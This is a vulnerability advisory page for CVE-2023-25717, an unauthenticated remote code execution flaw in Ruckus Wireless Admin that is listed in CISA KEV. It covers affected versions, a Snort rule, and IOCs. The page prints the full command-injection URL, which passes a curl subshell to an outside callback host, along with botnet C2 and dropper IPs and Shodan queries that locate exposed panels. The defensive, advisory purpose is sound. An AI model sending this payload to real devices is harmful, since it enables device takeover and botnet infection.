cbcvebase.
CVE-2023-25717
published 2023-02-13

CVE-2023-25717: Ruckus Wireless Admin through 10.4 allows Remote Code Execution via an unauthenticated HTTP GET Request, as demonstrated by a…

PriorityP199critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWEXPLOIT
CISA Known Exploited Vulnerabilitydue 2023-06-02
Exploited in the wild
EPSS
95.11%
99.9th percentile
Ruckus Wireless Admin through 10.4 allows Remote Code Execution via an unauthenticated HTTP GET Request, as demonstrated by a /forms/doLogin?login_username=admin&password=password$(curl substring.

Affected

8 ranges
VendorProductVersion rangeFixed in
commscoperuckus_smartzone_firmware< 5.2.1.35.2.1.3
commscoperuckus_smartzone_firmware< 5.2.1.3.16955.2.1.3.1695
commscoperuckus_smartzone_firmware
ruckuswirelessruckus_wireless_admin<= 10.4
ruckuswirelesssmartzone_ap< 6.1.0.0.92406.1.0.0.9240
ruckuswirelesssmartzone_ap< 5.2.2.0.20645.2.2.0.2064
ruckuswirelesssmartzone_ap< 3.6.2.0.7953.6.2.0.795
ruckuswirelesssmartzone_ap< 6.1.1.0.12746.1.1.0.1274

Detection & IOCsextracted from sources · hover to see the quote

url/forms/doLogin?login_username=admin&password=password$(curl%20{{interactsh-url}})&x=0&y=0
path/forms/doLogin
snort
alert http any any -> $HOME_NET any (msg:"ET EXPLOIT Ruckus Wireless Admin Remote Code Execution Attempt (CVE 2023-25717)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/forms/doLogin?login_username="; startswith; fast_pattern; content:"&password="; distance:0; content:"|24 28|"; distance:0; content:"|29|"; endswith; reference:cve,2023-25717; classtype:attempted-admin; sid:2045783; rev:1; metadata:affected_product Router, attack_target Networking_Equipment, created_at 2023_05_19, cve CVE_2023_25717, deployment Perimeter, deployment SSLDecrypt, performance_impact Low, confidence High, signature_severity Major, updated_at 2023_05_19, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application; target:dest_ip;)
bytes
|24 28| ... |29|
  • Exploit uses an unauthenticated HTTP GET (and POST per Snort rule) request to /forms/doLogin with shell command injection in the password parameter via $() subshell syntax — look for literal dollar-sign + open-paren bytes (0x24 0x28) in the password field followed by close-paren (0x29)
  • AndoryuBot C2 communication uses SOCKS5 protocol on port 10333 to 45.153.243.39 — alert on outbound SOCKS5 connections from Ruckus AP management IPs to this host/port
  • AndoryuBot dropper script is downloaded from 163.123.142.146 via curl — monitor for outbound HTTP connections from Ruckus APs to this IP
  • Nuclei template matcher: HTTP 302 redirect response combined with interactsh callback containing 'user-agent' and 'curl' in the request confirms successful RCE via CVE-2023-25717
  • Shodan/FOFA queries for exposed Ruckus admin panels: use title:"ruckus wireless" or http.title:"ruckus wireless" to identify internet-facing targets
  • Exploit parameters are consistent: login_username=admin and password field contains $() subshell — the Snort rule triggers on POST to /forms/doLogin?login_username= with bytes 0x24 0x28 ... 0x29 in the password value
  • ·The Nuclei PoC template uses an out-of-band interaction (interactsh) to confirm RCE — passive network monitoring alone will not confirm exploitation without observing the callback
  • ·The Snort rule (sid:2045783) is scoped to POST method only, but the NVD description and Nuclei template demonstrate exploitation via GET — detections relying solely on POST matching may miss GET-based exploit attempts
  • ·The vulnerability affects Ruckus Wireless Admin through version 10.4 and impacts ZoneDirector, SmartZone, and Solo APs — scope of affected devices is broad and includes end-of-life products that may not receive patches

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck9.8CRITICAL
cisa9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.